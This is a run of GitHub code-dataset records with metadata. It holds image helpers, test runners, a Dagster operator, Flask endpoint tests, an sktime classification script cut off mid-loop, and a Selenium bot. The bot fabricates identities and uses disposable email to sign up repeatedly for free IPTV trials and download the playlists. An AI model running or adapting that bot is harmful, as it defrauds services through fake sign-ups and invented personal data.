None:\n \"\"\"\n Rename all files in a directory\n\n Args:\n path_images (str): Directory where images are located\n prefix_name (str): Prefix to add for all images in directory\n Return:\n None\n \"\"\"\n files = os.listdir(path_images)\n for index, file in enumerate(files):\n index_image = str(index)\n os.rename(\n os.path.join(path_images, file),\n os.path.join(path_images, f\"{prefix_name}_{index_image}.jpg\"),\n )\n\n\ndef show_face_mask_roi(frame: numpy.ndarray, coordinates: tuple) -> None:\n \"\"\"\n Show face mask ROI in face's bounding box\n\n Args:\n frame (str): Frame captured by camera\n coordinates (tuple): Face-Mask ROI coordinates\n Return:\n None\n \"\"\"\n cv2.rectangle(\n frame,\n (coordinates[0], coordinates[2]),\n (coordinates[1], coordinates[3]),\n GREEN_COLOR,\n LINE_THICKNESS,\n )\n", "repo_name": "fabriparadiso/face_mask_facial_recognition", "sub_path": "libraries/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 7597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.ndarray", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 31, "usage_type": "call"}, {"api_name": "config.TEXT_COORDINATES", 
"line_number": 34, "usage_type": "argument"}, {"api_name": "config.TEXT_FONT", "line_number": 35, "usage_type": "argument"}, {"api_name": "config.FONT_SCALE", "line_number": 36, "usage_type": "argument"}, {"api_name": "config.GREEN_COLOR", "line_number": 37, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 38, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 43, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 72, "usage_type": "call"}, {"api_name": "config.TEXT_FONT", "line_number": 76, "usage_type": "argument"}, {"api_name": "config.MATCH_SCALE", "line_number": 77, "usage_type": "argument"}, {"api_name": "config.BLACK_COLOR", "line_number": 78, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 79, "usage_type": "argument"}, {"api_name": "imutils.paths.list_images", "line_number": 85, "usage_type": "call"}, {"api_name": "imutils.paths", "line_number": 85, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.BORDER_DEFAULT", "line_number": 87, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 88, "usage_type": "call"}, {"api_name": "config.RESIZE_SIZE", "line_number": 88, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 93, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 103, "usage_type": "call"}, {"api_name": "config.WHITE_COLOR", "line_number": 107, "usage_type": "argument"}, {"api_name": "cv2.putText", "line_number": 110, "usage_type": "call"}, {"api_name": "config.TEXT_FONT", "line_number": 114, "usage_type": "argument"}, {"api_name": "config.FONT_SCALE", "line_number": 115, "usage_type": "argument"}, {"api_name": "config.BLACK_COLOR", "line_number": 116, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 117, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 122, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 134, "usage_type": "call"}, {"api_name": "config.WHITE_COLOR", "line_number": 138, "usage_type": "argument"}, {"api_name": "cv2.putText", "line_number": 141, "usage_type": "call"}, {"api_name": "config.TEXT_FONT", "line_number": 145, "usage_type": "argument"}, {"api_name": "config.FONT_SCALE", "line_number": 146, "usage_type": "argument"}, {"api_name": "config.BLACK_COLOR", "line_number": 147, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 148, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 153, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 162, "usage_type": "call"}, {"api_name": "config.WHITE_COLOR", "line_number": 166, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 173, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 202, "usage_type": "call"}, {"api_name": 
"socket.gethostbyname", "line_number": 214, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 214, "usage_type": "call"}, {"api_name": "json.load", "line_number": 227, "usage_type": "call"}, {"api_name": "json.load", "line_number": 243, "usage_type": "call"}, {"api_name": "json.load", "line_number": 259, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 275, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 278, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 284, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 294, "usage_type": "call"}, {"api_name": "config.GREEN_COLOR", "line_number": 298, "usage_type": "argument"}, {"api_name": "config.LINE_THICKNESS", "line_number": 299, "usage_type": "argument"}]} +{"seq_id": "35591668395", "text": "#coding:utf-8\nfrom other.base import RunMethod\nfrom data.get_data import GetData\nimport sys\nsys.path.append(\"D:\\\\www\\\\ImoocInterface\")\n\n\nclass RunTest:\n def __init__(self):\n self.run_method = RunMethod()\n self.data = GetData()\n\n #程序执行的主入口\n def go_on_run(self):\n res = None\n rows_count = self.data.get_case_lines()\n for i in range(1,rows_count):\n url = self.data.get_request_url(i)\n method = self.data.get_request_method(i)\n is_run = self.data.get_is_run(i)\n data = self.data.get_data_for_json(i)\n expect = self.data.get_expect_data(i)\n header = self.data.is_header(i)\n if is_run:\n res = self.run_method.run_main(method,url,data,header)\n if util.common_util.is_contain(expect,res):\n print(\"测试通过\")\n else:\n print(\"测试失败\")\n\n return res\nif __name__ == '__main__':\n run = RunTest()\n print(run.go_on_run())\n\n\n\n\n\n\n", "repo_name": "frank2638/ImoocInterface", "sub_path": "main/run_test.py", "file_name": "run_test.py", "file_ext": "py", "file_size_in_byte": 1058, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "other.base.RunMethod", "line_number": 10, "usage_type": "call"}, {"api_name": "data.get_data.GetData", "line_number": 11, "usage_type": "call"}, {"api_name": "data.get_data", "line_number": 21, "usage_type": "name"}, {"api_name": "data.get_data", "line_number": 25, "usage_type": "argument"}]} +{"seq_id": "9886942947", "text": "import logging\n\nfrom dagster_airflow.operators.util import ( # type: ignore # (old airflow)\n invoke_steps_within_python_operator,\n)\nfrom dagster_airflow.vendor.python_operator import PythonOperator # type: ignore # (old airflow)\n\n# Template for creating a custom dagster operator that wraps Airflow PythonOperator.\n# To use, copy this file and stub out lines 14 - 17 with custom logic\n\n\nclass CustomOperator(PythonOperator):\n def __init__(self, dagster_operator_parameters, *args, **kwargs):\n def python_callable(ts, dag_run, **kwargs):\n # Add custom logic here\n logger = logging.getLogger(\"CustomOperatorLogger\")\n logger.setLevel(logging.INFO)\n logger.info(\"CustomOperator is called\")\n\n return invoke_steps_within_python_operator(\n dagster_operator_parameters.invocation_args, ts, 
dag_run, **kwargs\n )\n\n super(CustomOperator, self).__init__(\n *args,\n task_id=dagster_operator_parameters.task_id,\n provide_context=True,\n python_callable=python_callable,\n dag=dagster_operator_parameters.dag,\n **kwargs,\n )\n", "repo_name": "dagster-io/dagster", "sub_path": "python_modules/dagster-test/dagster_test/dagster_airflow/custom_operator.py", "file_name": "custom_operator.py", "file_ext": "py", "file_size_in_byte": 1184, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8986, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dagster_airflow.vendor.python_operator.PythonOperator", "line_number": 12, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 17, "usage_type": "attribute"}, {"api_name": "dagster_airflow.operators.util.invoke_steps_within_python_operator", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "2727795887", "text": "import unittest, sys\nsys.path.append('..')\nimport event_app.app\nfrom unittest.mock import patch\nfrom pprint import pprint\nimport json\n\nevent = {\n \"keywords\": \"\",\n \"tags\": [],\n \"radius\": \"2mi\",\n \"user_location\": {\n \"lat\": 37.7749300, #default: San Francisco\n \"lng\": -122.4194200\n },\n \"cost\": 20, # upper bound of cost\n \"time\": [],\n \"date\": \"\"\n}\n\nclass EventEndPoint(unittest.TestCase):\n '''testing the logic of the event search Flask endpoint'''\n def setUp(self):\n '''set up Flask test client'''\n event_app.app.app.config['TESTING'] = True\n self.app = event_app.app.app.test_client()\n\n def tearDown(self):\n '''re-initialize event data'''\n event['keywords'] = \"\"\n event['tags'] = []\n event['cost'] = 20\n event['radius'] = \"2mi\"\n\n @staticmethod\n def DBsearch_side_effect(query):\n '''returns different values based on the input query receiveed'''\n print(\"query received\")\n pprint(query)\n all_events = {\n 'query': {\n 'constant_score': {\n 'filter': {\n 'bool': {\n 'must': [\n {'geo_distance': {\n 'distance': \"\",\n 'location': {\n 'lat': 37.77493,\n 'lon': -122.41942\n }\n }\n },\n {'range': {\n 'cost': {\n 'gte': -1,\n 'lte': 0\n }\n }\n }\n ]\n }\n }\n }\n }\n }\n\n event_query = {\n 'query': {\n 'bool': {\n 'filter': {\n 'bool': {\n 'must': [\n {'geo_distance': {\n 'distance': '2mi',\n 'location': {'lat': 37.77493,\n 'lon': -122.41942\n }\n }\n },\n {'range': {\n 'cost': {\n 'gte': -1,\n 'lte': 20\n }\n }\n }\n ]\n }\n },\n 'must': {\n 'multi_match': {\n 'fields': ['name', 'description', 'tags'],\n 'fuzziness': 'AUTO',\n 'query': '',\n 'analyzer': 'event_english'\n }\n }\n }\n }\n }\n if 'constant_score' in query['query']:\n radius = query['query']['constant_score']['filter']['bool']['must'][0]['geo_distance']['distance']\n max_cost = query['query']['constant_score']['filter']['bool']['must'][1]['range']['cost']['lte']\n all_events['query']['constant_score']['filter']['bool']['must'][0]['geo_distance']['distance'] = radius\n all_events['query']['constant_score']['filter']['bool']['must'][1]['range']['cost']['lte'] = max_cost\n\n else:\n query_string = query['query']['bool']['must']['multi_match']['query']\n event_query['query']['bool']['must']['multi_match']['query'] = query_string\n\n # search for all events\n if query == all_events:\n return {'Music': 'a', 'Family': 'b', 'Workshop': 'c'}\n\n # search for event keywords\n elif query == event_query:\n return {'Music': 'Beetles Anniversary'}\n\n else:\n return {'error': 'does not exist'}\n\n\n def get_data(self, 
event):\n '''send test data from the front end to the endpoint'''\n response = self.app.post(\n '/api/event_search',\n data=json.dumps(event),\n content_type='application/json')\n return response\n\n\n @patch('event_app.app.db.search')\n def test_search_all(self, mock_DB_search):\n ''''Check that \"Any\" event tag generates query for all events'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n\n # data sent from the front end to be parsed and queried\n event['tags'] = [\"Any\"]\n print(\"datat sent\")\n pprint(event)\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n\n @patch('event_app.app.db.search')\n def test_event_tags(self, mock_DB_search):\n '''Check that selected event tags generate appropriate query'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n\n # data sent from the front end to be parsed and queried\n event['tags'] = [\"Festival/Fair\", \"Museums\", \"Theater\"]\n\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'Beetles Anniversary'})\n\n\n @patch('event_app.app.db.search')\n def test_event_keywords(self, mock_DB_search):\n '''Check that event keywords generate appropriate query'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n\n # data sent from the front end to be parsed and queried\n event['keywords'] = \"Beetles Concert SF\"\n\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'Beetles Anniversary'})\n\n\n @patch('event_app.app.db.search')\n def test_cost(self, mock_DB_search):\n '''check that endpoint validates cost range input'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n event['tags'] = ['Any']\n\n event['cost'] = \"100+\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['cost'] = 0\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['cost'] = -140.45\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n '''should I worry about this?\n event['cost'] = 0827428\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n '''\n event['cost'] = \"2de42&&*(\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n event['cost'] = 17.3987175083922340920230712370238939128349014\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n\n @patch('event_app.app.db.search')\n def test_radius(self, mock_DB_search):\n '''check that endpoint validates radius input'''\n mock_DB_search.side_effect = EventEndPoint.DBsearch_side_effect\n event['tags'] = ['Any']\n\n event['radius'] = \"-3mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n event['radius'] = \"2.34057198340981209834098103489398734576349714mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n 
self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['radius'] = \"0mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n event['radius'] = \"00248271mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 200)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['radius'] = \"0024.8271mi\"\n response = self.get_data(event)\n self.assertEqual(json.loads(response.data.decode()),\n {'Music': 'a', 'Family': 'b', 'Workshop': 'c'})\n\n event['radius'] = \"8ne48*%@4mi\"\n response = self.get_data(event)\n self.assertTrue(response.status_code == 404)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "tanyastropheus/Events_Near_Me", "sub_path": "tests/test_endpoint.py", "file_name": "test_endpoint.py", "file_ext": "py", "file_size_in_byte": 9236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "unittest.TestCase", "line_number": 21, "usage_type": "attribute"}, {"api_name": "event_app.app.app", "line_number": 25, "usage_type": "attribute"}, {"api_name": "event_app.app", "line_number": 25, "usage_type": "name"}, {"api_name": "event_app.app.app.app.test_client", "line_number": 26, "usage_type": "call"}, {"api_name": "event_app.app.app", "line_number": 26, "usage_type": "attribute"}, {"api_name": "event_app.app", "line_number": 26, "usage_type": "name"}, {"api_name": "pprint.pprint", "line_number": 39, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 128, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 141, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 144, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 133, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 158, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 148, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 172, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 162, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 185, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 191, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 210, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 176, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 227, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 237, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 242, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 214, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 251, "usage_type": "call"}]} +{"seq_id": "9893926192", "text": "from genericpath import isfile\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport random\nimport csv\nimport threading\nimport os\nfrom webdriver_manager.chrome import ChromeDriverManager\n\nchrome_options = Options()\n# chrome_options.add_argument(\"--headless\")\nchrome_options.add_argument('window-size=1920x1080')\nchrome_options.add_argument(\"--disable-gpu\")\nprefs = 
{'download.default_directory' : 'iptv_daily'}\nchrome_options.add_experimental_option('prefs', prefs)\n\ndef who():\n global company, email, zipcode, first, last, job, phone, street_address, macos, state, ios\n company = open('company.csv').read().splitlines()\n company =random.choice(company)\n print(company)\n if \" \" in company:\n company = company.split(\" \")\n company = company[0]\n print(company)\n else:\n pass\n print(company)\n\n zipcode = open('zipcode.csv').read().splitlines()\n zipcode =random.choice(zipcode)\n zipcode = zipcode.split(\",\")\n state = zipcode[1]\n zipcode = zipcode[0]\n print(zipcode)\n print(state)\n\n first = open('firstnames.txt').read().splitlines()\n first =random.choice(first)\n print(first)\n\n last = open('last.csv').read().splitlines()\n last =random.choice(last)\n print(last)\n url = [\".com\", \".org\", \".net\", \".co\", \".ai\", \".io\"]\n url = random.choice(url)\n\n email = [f'{first}{last}@{company}{url}', f'{first[0]}{last}@{company}{url}', f\"{first[0]}{last[0]}@{company}{url}\", f\"{last[0]}{first}@{company}{url}\", f\"{first}@{company}{url}\" ]\n email = random.choice(email)\n print(email)\n\n phone = random.randint(1111111111,9999999999)\n print(phone)\n\n # job = [\"Ceo\", \"COO\", \"Head of Security\", \"Business Manager\", \"Security Officer\", \"CFO\", \"Admin\", \"HR Manager\", \"IT Manager\", \"Director of IT\", \"Director of Security\", \"Information Security Analyst\", \"Network Security Administrator\", \"Cyber Crime Investigator\", \"Network Security Engineer\", \"Security Manager\"]\n # job = random.choice(job)\n # print(job)\n\n street_address_number = str(random.randint(1,2000))\n street_address = street_address_number + \" \" + company\n # ios = random.randint(10, 2000)\n\nclass free_iptv_auto:\n \n def __init__(self):\n self.driver = webdriver.Chrome(ChromeDriverManager().install(), options=chrome_options)\n\n\n def free_trial(self):\n ## Open tempmail\n self.driver.get(\"https://www.disposablemail.com/\")\n sleep(5)\n get_email = self.driver.find_element_by_xpath('/html/body/div[2]/div[3]/div/div[1]/div[1]/div/div[1]/div/div[5]/span')\n get_email = get_email.text\n print(get_email)\n self.driver.find_element_by_tag_name('body').send_keys(Keys.COMMAND + 't') \n sleep(5)\n\n\n ## Order free IPTV\n self.driver.get(\"https://free.viewsible.com/trial\")\n sleep(5)\n select_m3u = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div[2]/form/div/div[1]/div[4]/div[1]/select/option[2]')\n select_m3u.click()\n yes_usa = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div[2]/form/div/div[1]/div[4]/div[6]/select/option[2]')\n yes_usa.click()\n continue_button = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div[2]/form/div/div[2]/div/div[2]/button')\n continue_button.click()\n sleep(2)\n checkout = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div[2]/div[2]/div[2]/div/div[2]/div[5]/a[1]')\n checkout.click()\n\n\n\n\n\n\n email_field = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[2]/div[3]/div[3]/div/input')\n email_field.send_keys(get_email)\n first_field = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[2]/div[3]/div[1]/div/input')\n first_field.send_keys(first)\n last_field = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[2]/div[3]/div[2]/div/input')\n 
last_field.send_keys(last)\n generate_password = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[3]/div[2]/div[2]/div/input')\n generate_password.send_keys('pass!diek83')\n generate_password_confirm = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[3]/div[2]/div[3]/div/input')\n generate_password_confirm.send_keys('pass!diek83')\n submit = self.driver.find_element_by_xpath('/html/body/section[3]/div/div/div[1]/div/div/div/form/div[13]/button')\n submit.click()\n sleep(15)\n\n ### Open Tab to email confirmation\n self.driver.get(\"https://www.disposablemail.com/\")\n\n sleep(360)\n self.driver.get('https://www.disposablemail.com/window/id/3')\n try:\n username = self.driver.find_element_by_xpath('/html/body/table/tbody/tr/td/table/tbody/tr/td/table[3]/tbody/tr/td/table[1]/tbody/tr/td/div[4]/blockquote/p[6]').text\n print(username)\n print('firstone')\n except:\n username = self.driver.find_element_by_xpath('/html/body/table/tbody/tr/td/table/tbody/tr/td/table[3]/tbody/tr/td/table[1]/tbody/tr/td/div[4]/blockquote/p[6]').text()\n print(username)\n print('secondone')\n \n\n\n \n\n ###Downloading the m3u\n self.driver.get('https://best-usa-hosting.com/clientarea.php?action=services')\n sleep(3)\n my_iptv = self.driver.find_element_by_xpath('/html/body/center/font/b/center/center/center/center/center/center/section[3]/div/div/div[3]/div/div[1]/div[1]/table/tbody/tr[1]')\n my_iptv.click()\n sleep(2)\n iptv_details = self.driver.find_element_by_xpath('/html/body/center/font/b/center/center/center/center/center/center/section[3]/div/div/div[3]/div/div[1]/div/div[5]/div[1]/form/button')\n iptv_details.click()\n iptv_link = self.driver.find_element_by_xpath('/html/body/center/font/b/center/center/center/center/center/center/section[3]/div/div/div[3]/div/div[1]/center/a')\n save_link = iptv_link.get_attribute('href')\n self.driver.get(save_link)\n print(f'downloaded started. 
file name is {save_link}')\n sleep(120)\n if os.path.isfile(\"busa.one*\"):\n os.remove(\"iptv_daily/iptv_daily_update.m3u\")\n print('file removed')\n folder = r'iptv_daily/'\n count = 1\n # count increase by 1 in each iteration\n # iterate all files from a directory\n for file_name in os.listdir(folder):\n # Construct old file name\n source = folder + file_name\n\n # Adding the count to the new file name and extension\n destination = folder + \"iptv_daily_update.m3u\"\n\n # Renaming the file\n os.rename(source, destination)\n count += 1\n\n print('New Names are')\n # verify the result\n res = os.listdir(folder)\n print(res)\n print(\"finished\")\n\n else:\n print('no change')\n pass\n \n \n\n\n\n\n\n\ndef do_requests():\n who()\n bot = free_iptv_auto()\n bot.free_trial()\n\ndo_requests()\n\n", "repo_name": "zacnicholson/iptv_daily_update", "sub_path": "free_iptv_new_site.py", "file_name": "free_iptv_new_site.py", "file_ext": "py", "file_size_in_byte": 7785, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 12, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 33, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 41, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 48, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 51, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 54, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 61, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 68, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 68, "usage_type": "name"}, {"api_name": "webdriver_manager.chrome.ChromeDriverManager", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 74, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.keys.Keys.COMMAND", "line_number": 78, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 79, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 84, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 91, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 112, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 117, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 134, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 137, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 145, "usage_type": "call"}, {"api_name": "os.path", "line_number": 145, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 146, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 152, "usage_type": "call"}, {"api_name": "os.rename", "line_number": 160, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 165, "usage_type": "call"}]} +{"seq_id": "23514305447", "text": "# Import of relevent sktime and sktime module information\r\n\r\nfrom sktime.classification.interval_based import TimeSeriesForestClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import 
mean_squared_error\r\nfrom sktime.classification.distance_based import KNeighborsTimeSeriesClassifier\r\nfrom sklearn import svm\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sktime.transformations.panel.shapelets import ContractedShapeletTransform\r\nfrom sktime.transformations.panel.pca import PCATransformer\r\nfrom sktime.utils.data_processing import from_2d_array_to_nested\r\nfrom sktime.utils.data_processing import from_3d_numpy_to_nested\r\nfrom sktime.utils.data_processing import from_nested_to_2d_array\r\nfrom sktime.utils.data_processing import from_nested_to_3d_numpy\r\nfrom sktime.transformations.panel.rocket import Rocket\r\nfrom sktime.transformations.panel.tsfresh import TSFreshFeatureExtractor\r\nfrom sktime.transformations.panel.summarize import RandomIntervalFeatureExtractor\r\nfrom sktime.utils.slope_and_trend import _slope\r\nfrom sktime.utils.data_io import load_from_tsfile_to_dataframe\r\nfrom sktime.transformations.panel.dictionary_based import SFA\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom numpy.fft import fft\r\nimport math\r\nfrom scipy.fft import ifftn\r\nfrom sktime.transformations.series.acf import AutoCorrelationTransformer\r\nfrom sklearn.preprocessing import PowerTransformer\r\nfrom sktime.transformations.panel.reduce import Tabularizer\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nimport sktime\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nDATA_PATH = os.path.join(os.path.dirname(sktime.__file__), \"C:\\\\Users\\\\James\\\\Documents\\\\uni\\\\CompMasters\\\\Diss\\\\Univariate_ts\")\r\n\r\ndatasets_trainA = [\"GunPoint\", \"ArrowHead\",\"Beef\",\"Lightning2\",\"Lightning7\",\"ECG200\",\"Adiac\",\"FaceFour\",\"FiftyWords\",\"CBF\",\"Fish\"]\r\ndatasets_testA = datasets_trainA\r\n\r\ndatasets_train = []\r\ndatasets_test = []\r\n\r\nfor i in range(len(datasets_trainA)):\r\n datasets_train.append(datasets_trainA[i] + str(\"\\\\\") + datasets_trainA[i] + str(\"_TRAIN.ts\"))\r\nfor i in range(len(datasets_testA)):\r\n datasets_test.append(datasets_testA[i] + str(\"\\\\\") + datasets_testA[i] + str(\"_TEST.ts\"))\r\n\r\nclassifier_Knn = KNeighborsTimeSeriesClassifier(n_neighbors=1, distance=\"euclidean\")\r\nclassifier_DTW = KNeighborsTimeSeriesClassifier(n_neighbors=1, distance=\"dtw\")\r\n\r\npipeline_pst_knn = Pipeline(\r\n [\r\n (\r\n \"pst\",\r\n PowerTransformer())\r\n ,\r\n (\"knn\", KNeighborsClassifier(n_neighbors = 3)),\r\n ]\r\n)\r\n\r\npipeline_act_knn = Pipeline(\r\n [\r\n #(\"act\", AutoCorrelationTransformer()),\r\n (\"knn\", KNeighborsClassifier(n_neighbors = 3)),\r\n ]\r\n)\r\n\r\npipeline_pca_knn = Pipeline(\r\n [\r\n (\"ss\", StandardScaler()),\r\n (\"pca\", PCA()),\r\n (\"knn\", KNeighborsClassifier(n_neighbors = 3))\r\n ]\r\n)\r\nact = AutoCorrelationTransformer()\r\n\r\n#bundle up the classifiers\r\nclfs = [ classifier_Knn, classifier_DTW, pipeline_pst_knn, pipeline_act_knn, pipeline_pca_knn]\r\nnames = [\"Euclidean\", \"DTW\", \"powerknn\", \"actknn\", \"pcaknn\"]\r\ntable = {'Classifier':names}\r\ntable = pd.DataFrame(table)\r\n\r\n\r\nfor k, j in zip(datasets_train, datasets_test):\r\n train_x, train_y = load_from_tsfile_to_dataframe(\r\n os.path.join(DATA_PATH, k))\r\n test_x, test_y = load_from_tsfile_to_dataframe(\r\n os.path.join(DATA_PATH, j))\r\n pcas = []\r\n \r\n #fit the classifiers with the data\r\n for clf in clfs:\r\n if clf in 
